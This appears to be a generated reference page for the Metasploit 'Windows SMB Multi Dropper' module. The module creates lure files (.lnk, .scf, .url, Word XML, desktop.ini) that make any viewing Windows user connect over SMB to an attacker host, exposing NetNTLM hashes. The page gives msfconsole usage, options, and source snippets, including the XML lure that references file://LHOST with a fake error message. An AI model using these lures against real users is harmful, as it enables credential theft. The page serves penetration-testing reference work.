Windows SMB Multi Dropper - Metasploit
This page contains detailed information about how to use the auxiliary/fileformat/multidrop metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows SMB Multi Dropper
Module: auxiliary/fileformat/multidrop
Source code: modules/auxiliary/fileformat/multidrop.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module dependent on the given filename extension creates either a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference to the the specified remote host, causing SMB connections to be initiated from any user that views the file.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/fileformat/multidrop
msf auxiliary(multidrop) > show targets
... a list of targets ...
msf auxiliary(multidrop) > set TARGET target-id
msf auxiliary(multidrop) > show options
... show and set options ...
msf auxiliary(multidrop) > exploit
Required Options
- LHOST: Host listening for incoming SMB/WebDAV traffic
Go back to menu.
Msfconsole Usage
Here is how the fileformat/multidrop auxiliary module looks in the msfconsole:
msf6 > use auxiliary/fileformat/multidrop
msf6 auxiliary(fileformat/multidrop) > show info
Name: Windows SMB Multi Dropper
Module: auxiliary/fileformat/multidrop
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Richard Davy - secureyourit.co.uk
Lnk Creation Code by Mubix
asoto-r7
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME word.lnk yes Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini
LHOST yes Host listening for incoming SMB/WebDAV traffic
Description:
This module dependent on the given filename extension creates either
a .lnk, .scf, .url, .xml, or desktop.ini file which includes a
reference to the the specified remote host, causing SMB connections
to be initiated from any user that views the file.
References:
https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018
https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/
https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
Module Options
This is a complete list of options available in the fileformat/multidrop auxiliary module:
msf6 auxiliary(fileformat/multidrop) > show options
Module options (auxiliary/fileformat/multidrop):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME word.lnk yes Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini
LHOST yes Host listening for incoming SMB/WebDAV traffic
Advanced Options
Here is a complete list of advanced options supported by the fileformat/multidrop auxiliary module:
msf6 auxiliary(fileformat/multidrop) > show advanced
Module advanced options (auxiliary/fileformat/multidrop):
Name Current Setting Required Description
---- --------------- -------- -----------
DisablePayloadHandler true no Disable the handler code for the selected payload
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the fileformat/multidrop module can do:
msf6 auxiliary(fileformat/multidrop) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the fileformat/multidrop auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(fileformat/multidrop) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Invalid FILENAME option
Here is a relevant code snippet related to the "Invalid FILENAME option" error message:
49: elsif datastore['FILENAME'].chars.last(3).join=="url"
50: create_url
51: elsif datastore['FILENAME'].chars.last(3).join=="xml"
52: create_xml
53: else
54: fail_with(Failure::BadConfig,"Invalid FILENAME option")
55: end
56: end
57:
58: def createlnk
59: #Code below taken from module droplnk.rb written by Mubix
FATAL ERROR: The document failed to render properly.
Here is a relevant code snippet related to the "FATAL ERROR: The document failed to render properly." error message:
146: xml=""
147: xml << "<?xml version='1.0' encoding='utf-8' ?>"
148: xml << "<?mso-application progid='Word.Document'?>"
149: xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"
150: xml << "<Text>"
151: xml << " FATAL ERROR: The document failed to render properly."
152: xml << "</Text>"
153:
154: file_create(xml)
155: end
156:
Go back to menu.
Related Pull Requests
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #10589 Merged Pull Request: Added auxiliary/fileformat/multidrop support for Word XML documents
- #10157 Merged Pull Request: Multidrop Module Code Improvement
References
- CVE: Not available
- https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018
- https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/
- https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/
See Also
Check also the following modules related to this module:
- auxiliary/dos/ssl/dtls_changecipherspec
- auxiliary/scanner/ipmi/ipmi_cipher_zero
- post/windows/gather/enum_ad_service_principal_names
- auxiliary/fileformat/badpdf
- auxiliary/fileformat/odt_badodt
Authors
- Richard Davy - secureyourit.co.uk
- Lnk Creation Code by Mubix
- asoto-r7
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.